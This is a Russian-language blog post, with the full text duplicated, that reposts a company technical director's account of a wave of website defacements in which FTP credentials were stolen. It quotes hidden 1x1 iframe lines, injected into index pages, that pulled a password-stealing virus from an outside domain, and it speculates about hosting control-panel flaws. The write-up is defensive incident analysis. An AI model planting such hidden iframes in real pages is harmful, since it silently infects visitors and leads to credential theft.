Вот тут товарищ мой и коллега любопытную статейку написал:
Из официального заявления представителей ЗАО «Мастерхост»
«Специалистами службы технической безопасности компании .masterhost за последние дни было зафиксировано резкое увеличение случаев хищения реквизитов FTP-доступа с компьютеров пользователей. Велика вероятность того, что это целенаправленные волновые атаки троянских программ или вирусов, которые осуществляют различные несанкционированные вами действия. Наши специалисты совместно с компаниями-партнерами, специализирующимися на решениях по информационной безопасности, активно изучают зловредный трафик с целью локализации очага вредоносных атак...»
Что произошло?
В одно прекрасное утро на главных и прочих страницах нескольких сайтов появились голые бабы. На уровне HTML-кода это выглядело следующим образом:
ифрейм src='http://lem0n.info/km/ya.php' width=1 height=1 ифрейм
ифрейм src='http://lem0n.info/km/love.htm' width=1 height=1 ифрейм
Такие строчки были вставлены в index.php, index.htm, index.html
При загрузке странички у посетителя пытался грузиться вирус (благо, нортон антивирус его не пропускал) и, помимо нормального контента сайта, загружались всевозможные голые женщины.
Сложность была в том, что имела место правка файлов на фтп. Подозревали, что взломана система администрирования, однако все оказалось совсем не так. Был взломан проект, свёрстанный в HTML, никакого PHP там в помине не было. К тому же, CHMOD везде стоял 644, а значит, править файлы мог либо владелец, либо root.
Кто это сделал?
Разумеется, мы запросили логи мастерхоста по заходам на площадки по фтп в ту «вальпургиеву ночь». Был обнаружен привязанный к домену SPORT.MCHOST.RU IP адрес, с которого заходили на фтп – 84.252.148.70. Это дало понять, что root тут ни при чём. При заходе на mchost.ru был обнаружен некий невнятный хостинг, имеющий в «контактах» только email и номер ICQ а в «способах оплаты» – яндекс-деньги. Другими словами, местоположение данного хостинга даже со спутника вряд ли пеленгуется. Вполне очевидно, что этот сервер просто был взломан и использовался как площадка для атаки. Владелец хостинга, конечно же, этого никогда не признает, а значит, и логов никаких не даст. Что, увы, оставляет злоумышленника вне зоны досягаемости.
Как взломали сайты?
Логи .masterhost подтверждают наличие захода по фтп на площадку, а значит, кто-то знал пароли. Маловероятно, что пароль подобрали. Более правдоподобной нам показалась версия, предполагающая наличие ищущих на локальном компьютере и отсылающих куда-либо пароли вирусов. Адекватные меры предосторожности против подобных атак всем известны. Дело казалось раскрытым, но… Было взломано много сайтов. Человека, который бы одновременно знал все эти пароли, не существовало. Google подсказал, что во Вселенной мы не одиноки: по сети прошла целая волна таких взломов.
Выводы
Массовость подобных взломов заставляет предположить, что дело не только в вирусах, которые рассылают пароли, но и в хостерах. Трудно поверить, что все пострадавшие попались на вирус. Как можно взломать хостера и узнать пароли на фтп? Вряд ли это был взлом FreeBSD – тому есть много причин. Следует согласиться с теми, кто полагает, что это был взлом контрольной панели.
1. У контрольной панели есть доступ к паролям на фтп (т к. с ее помощью их можно менять), стало быть, определенный запрос позволяет получить, как минимум, список хешей паролей (возможно, и сами пароли).
2. Взлому подверглись многие хостеры. Следовательно, они все имеют одну и ту же уязвимость в контрольной панели. Конечно, ни мастерхост, ни другие хостеры никогда не признают этого прямо. Однако некоторые их высказывания на тему взломов подтверждают версию взлома контрольной панели.
Пример: Valuehost
Что сделано нового сейчас:
+ используется новый алгоритм хранения паролей FTP для защиты от взломов;
+ введена функция в панели управления по установке количества дней устаревания нового пароля;
+ введена функция блокировки доступа по FTP, если Вы не собираетесь долго обновлять сайт.
новый алгоритм хранения паролей, функция устаревания паролей – нововведения помогающие защититься от кражи паролей с помощью перебора. Значит, до этого кто-то все-таки имел возможность перебирать пароли.
введена функция блокировки доступа по FTP, если Вы не собираетесь долго обновлять сайт – убийственный пункт.Хостеры, несмотря на принятые меры, не могут гарантировать полную защиту пароля на фтп и предлагают мне в целях безопасности вообще отключить фтп-доступ.
Мастерхост более осторожен в высказываниях, но факты взлома подтверждают то, что и у него наблюдаются подобные проблемы. Конечно же, нужно понимать, что изначально проблема кроется в софте, установленном в качестве контрольной панели, но позиция хостера все равно ошибочна. Он не озаботился разработкой собственной контрольной панели, а если и озаботился, то плохо защитил её.
Итоги размышлений над данным вопросом весьма плачевны: если уж агава и мастерхост подверглись взлому, что говорить о других хостерах. Остаётся надеяться и верить в то, что хостеры займутся разработкой своих контрольных панелей и сделают соответствующую защиту, а люди, в свою очередь, будут более тщательно охранять свои пароли и защищаться от вирусов. Надежда, как известно, умирает последней…
Необходимое дополнение
Вирус, что пытался грузится со взломанных сайтов, действительно находит и рассылает пароли с вашего компьютера. У нас так были взломаны 2 фтп-акаунта на наш рабочий сервер, на котором в принципе отсутствует контрольная панель, и в логах доступа нет попытки перебора паролей на фтп. Так что свои компы тоже нужно защищать и более серьезно относиться к хранению паролей.
Из официального заявления представителей ЗАО «Мастерхост»
«Для снижения риска инфицирования вашего компьютера также советуем вам своевременно осуществлять обновление антивирусного ПО, в том числе антивирусных баз.В случае подозрений, что целостность ваших данных была нарушена и какие-либо данные могли быть использованы посторонними лицами, оперативно измените пароль FTP-доступа к вашим ресурсам и обязательно проверьте ваш персональный компьютер свежим антивирусным ПО».
Технический директор компании «Творческие Люди»
А. Лебедев
Из официального заявления представителей ЗАО «Мастерхост»
«Специалистами службы технической безопасности компании .masterhost за последние дни было зафиксировано резкое увеличение случаев хищения реквизитов FTP-доступа с компьютеров пользователей. Велика вероятность того, что это целенаправленные волновые атаки троянских программ или вирусов, которые осуществляют различные несанкционированные вами действия. Наши специалисты совместно с компаниями-партнерами, специализирующимися на решениях по информационной безопасности, активно изучают зловредный трафик с целью локализации очага вредоносных атак...»
Что произошло?
В одно прекрасное утро на главных и прочих страницах нескольких сайтов появились голые бабы. На уровне HTML-кода это выглядело следующим образом:
ифрейм src='http://lem0n.info/km/ya.php' width=1 height=1 ифрейм
ифрейм src='http://lem0n.info/km/love.htm' width=1 height=1 ифрейм
Такие строчки были вставлены в index.php, index.htm, index.html
При загрузке странички у посетителя пытался грузиться вирус (благо, нортон антивирус его не пропускал) и, помимо нормального контента сайта, загружались всевозможные голые женщины.
Сложность была в том, что имела место правка файлов на фтп. Подозревали, что взломана система администрирования, однако все оказалось совсем не так. Был взломан проект, свёрстанный в HTML, никакого PHP там в помине не было. К тому же, CHMOD везде стоял 644, а значит, править файлы мог либо владелец, либо root.
Кто это сделал?
Разумеется, мы запросили логи мастерхоста по заходам на площадки по фтп в ту «вальпургиеву ночь». Был обнаружен привязанный к домену SPORT.MCHOST.RU IP адрес, с которого заходили на фтп – 84.252.148.70. Это дало понять, что root тут ни при чём. При заходе на mchost.ru был обнаружен некий невнятный хостинг, имеющий в «контактах» только email и номер ICQ а в «способах оплаты» – яндекс-деньги. Другими словами, местоположение данного хостинга даже со спутника вряд ли пеленгуется. Вполне очевидно, что этот сервер просто был взломан и использовался как площадка для атаки. Владелец хостинга, конечно же, этого никогда не признает, а значит, и логов никаких не даст. Что, увы, оставляет злоумышленника вне зоны досягаемости.
Как взломали сайты?
Логи .masterhost подтверждают наличие захода по фтп на площадку, а значит, кто-то знал пароли. Маловероятно, что пароль подобрали. Более правдоподобной нам показалась версия, предполагающая наличие ищущих на локальном компьютере и отсылающих куда-либо пароли вирусов. Адекватные меры предосторожности против подобных атак всем известны. Дело казалось раскрытым, но… Было взломано много сайтов. Человека, который бы одновременно знал все эти пароли, не существовало. Google подсказал, что во Вселенной мы не одиноки: по сети прошла целая волна таких взломов.
Выводы
Массовость подобных взломов заставляет предположить, что дело не только в вирусах, которые рассылают пароли, но и в хостерах. Трудно поверить, что все пострадавшие попались на вирус. Как можно взломать хостера и узнать пароли на фтп? Вряд ли это был взлом FreeBSD – тому есть много причин. Следует согласиться с теми, кто полагает, что это был взлом контрольной панели.
1. У контрольной панели есть доступ к паролям на фтп (т к. с ее помощью их можно менять), стало быть, определенный запрос позволяет получить, как минимум, список хешей паролей (возможно, и сами пароли).
2. Взлому подверглись многие хостеры. Следовательно, они все имеют одну и ту же уязвимость в контрольной панели. Конечно, ни мастерхост, ни другие хостеры никогда не признают этого прямо. Однако некоторые их высказывания на тему взломов подтверждают версию взлома контрольной панели.
Пример: Valuehost
Что сделано нового сейчас:
+ используется новый алгоритм хранения паролей FTP для защиты от взломов;
+ введена функция в панели управления по установке количества дней устаревания нового пароля;
+ введена функция блокировки доступа по FTP, если Вы не собираетесь долго обновлять сайт.
новый алгоритм хранения паролей, функция устаревания паролей – нововведения помогающие защититься от кражи паролей с помощью перебора. Значит, до этого кто-то все-таки имел возможность перебирать пароли.
введена функция блокировки доступа по FTP, если Вы не собираетесь долго обновлять сайт – убийственный пункт.Хостеры, несмотря на принятые меры, не могут гарантировать полную защиту пароля на фтп и предлагают мне в целях безопасности вообще отключить фтп-доступ.
Мастерхост более осторожен в высказываниях, но факты взлома подтверждают то, что и у него наблюдаются подобные проблемы. Конечно же, нужно понимать, что изначально проблема кроется в софте, установленном в качестве контрольной панели, но позиция хостера все равно ошибочна. Он не озаботился разработкой собственной контрольной панели, а если и озаботился, то плохо защитил её.
Итоги размышлений над данным вопросом весьма плачевны: если уж агава и мастерхост подверглись взлому, что говорить о других хостерах. Остаётся надеяться и верить в то, что хостеры займутся разработкой своих контрольных панелей и сделают соответствующую защиту, а люди, в свою очередь, будут более тщательно охранять свои пароли и защищаться от вирусов. Надежда, как известно, умирает последней…
Необходимое дополнение
Вирус, что пытался грузится со взломанных сайтов, действительно находит и рассылает пароли с вашего компьютера. У нас так были взломаны 2 фтп-акаунта на наш рабочий сервер, на котором в принципе отсутствует контрольная панель, и в логах доступа нет попытки перебора паролей на фтп. Так что свои компы тоже нужно защищать и более серьезно относиться к хранению паролей.
Из официального заявления представителей ЗАО «Мастерхост»
«Для снижения риска инфицирования вашего компьютера также советуем вам своевременно осуществлять обновление антивирусного ПО, в том числе антивирусных баз.В случае подозрений, что целостность ваших данных была нарушена и какие-либо данные могли быть использованы посторонними лицами, оперативно измените пароль FTP-доступа к вашим ресурсам и обязательно проверьте ваш персональный компьютер свежим антивирусным ПО».
Технический директор компании «Творческие Люди»
А. Лебедев
